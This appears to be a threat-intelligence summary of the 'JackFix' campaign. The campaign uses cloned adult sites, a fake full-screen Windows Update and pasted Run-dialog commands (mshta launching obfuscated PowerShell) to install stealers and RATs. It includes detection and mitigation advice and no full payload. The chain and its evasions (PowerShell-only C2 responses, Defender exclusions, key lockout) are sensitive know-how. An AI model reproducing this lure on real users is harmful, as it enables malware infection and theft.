Full Report
Cybersecurity researchers are calling attention to a new campaign that's leveraging a combination of ClickFix lures and fake adult websites to deceive users into running malicious commands under the guise of a "critical" Windows security update. "Campaign leverages fake adult websites (xHamster, PornHub clones) as its phishing mechanism, likely distributed via malvertising," Acronis said in a
Analysis Summary
# Tool/Technique: JackFix Campaign (Leveraging ClickFix methodology)
## Overview
The "JackFix" campaign is a new threat leveraging a methodology similar to ClickFix attacks, but specifically targets users on fake adult websites (clones of xHamster, PornHub) via malvertising. Victims are tricked into running malicious commands disguised as a "critical" Windows security update to initiate the infection chain, ultimately leading to the deployment of multiple stealer malware families.
## Technical Details
- Type: Technique / Campaign (Utilizes obfuscated scripts and legitimate binaries)
- Platform: Windows
- Capabilities: Screen takeover, JavaScript/HTML execution, PowerShell payload retrieval, privilege escalation, dropping secondary payloads (RATs, Stealers).
- First Seen: Recent, as detailed in a report shared by Acronis.
## MITRE ATT&CK Mapping
- **TA0001 - Initial Access**
- T1566 - Phishing
- T1566.002 - Spearphishing Link (Implied via malvertising redirect to malicious site)
- T1189 - Drive-by Compromise (The execution likely happens upon user interaction on the compromised site)
- **TA0002 - Execution**
- T1204.002 - User Execution: Malicious File (User intentionally runs the malicious command prompt)
- T1059 - Command and Scripting Interpreter
- T1059.001 - PowerShell
- **TA0004 - Privilege Escalation**
- T1548.002 - Bypass User Account Control (Usage of `Start-Process -Verb RunAs`)
- **TA0005 - Defense Evasion**
- T1027 - Obfuscated Files or Information (Use of garbage code, obfuscated PowerShell)
- **TA0011 - Command and Control**
- T1105 - Ingress Tool Transfer (Retrieving subsequent PowerShell scripts via remote server)
## Functionality
### Core Capabilities
- **Malvertising Distribution:** Redirects unsuspecting users to highly realistic cloned adult websites.
- **Screen Hijacking:** Uses HTML/JavaScript to force the browser into a full-screen mode, displaying a convincing, fake Windows Update alert to establish urgency.
- **Initial Command Execution:** Tricks the user into executing a command via the Windows Run dialog (`Ctrl + V`, Enter), which launches an **MSHTA payload**.
- **Payload Staging:** The MSHTA payload executes JavaScript to launch an **obfuscated PowerShell command** to retrieve and execute subsequent scripts from a remote server.
### Advanced Features
- **Anti-Analysis C2:** Remote domains hosting subsequent payloads are configured to redirect benign direct requests (e.g., in a browser) to legitimate sites (Google, Steam). The script only returns malicious code when requested via specific PowerShell commands (`irm` or `iwr`).
- **Persistence/Evasion:** The executed PowerShell script attempts to **elevate privileges** using `Start-Process -Verb RunAs` and creates **Microsoft Defender Antivirus exclusions** for C2 addresses and payload staging paths.
- **Key Lockout:** Attempts to disable escaping mechanisms (Escape, F11, F5, F12 keys) to prevent users from closing the fake update window, though this functionality was noted as faulty.
- **Secondary Deployment:** Upon successful privilege escalation, the campaign drops additional malware, including **simple Remote Access Trojans (RATs)** and **Stealers**.
## Indicators of Compromise
- File Hashes: Not specified in the excerpt.
- File Names: Not specified in the excerpt (Payloads are downloaded dynamically).
- Registry Keys: Not specified in the excerpt (Focus is on Defender exclusions).
- Network Indicators: **Remote servers hosting payloads** designed to only respond to PowerShell `irm`/`iwr` requests. (Domains must be defanged: e.g., hxxp://malicious-c2[.]com)
- Behavioral Indicators:
- Invocation of `mshta.exe` resulting from user interaction on a website.
- Use of `Start-Process -Verb RunAs` to elevate PowerShell sessions.
- Attempts to add exclusions to Microsoft Defender Antivirus.
## Associated Threat Actors
- Possibly a **Russian-speaking threat actor**, hinted by developer comments in Russian found within select site iterations.
- General association with groups utilizing **ClickFix-style infection chains**.
## Detection Methods
- **Signature-based detection:** Signatures for the initial MSHTA launch sequence or known malicious C2 domains.
- **Behavioral detection:** Monitoring for legitimate processes (like MSHTA) executing obscure or heavily obfuscated scripts that immediately attempt remote file retrieval via PowerShell or system changes (Defender exclusions, UAC prompts).
- **YARA rules:** Not explicitly mentioned.
## Mitigation Strategies
- **Browser Security:** Ensure JavaScript execution policies are tightly controlled, although this is difficult as the technique relies on standard browser functions.
- **User Education:** Educate users about the dangers of malvertising, especially on adult websites, and train them to identify and close browser alerts, particularly those demanding immediate security action via the Run dialog.
- **Principle of Least Privilege:** Limit user privileges to reduce the impact of successful privilege escalation attempts like those using `-Verb RunAs`.
- **Endpoint Protection:** Ensure EDR/XDR solutions are configured to flag or block the creation of security product exclusions by non-standard processes.
## Related Tools/Techniques
- **ClickFix:** This campaign is an iteration or evolution of widespread ClickFix attacks, which often use CAPTCHA or minor technical fixes as lures.
- **Stealers/RATs:** The specific malware families dropped are not named, but the delivery mechanism is designed to install commodity malware like Remote Access Trojans and Information Stealers.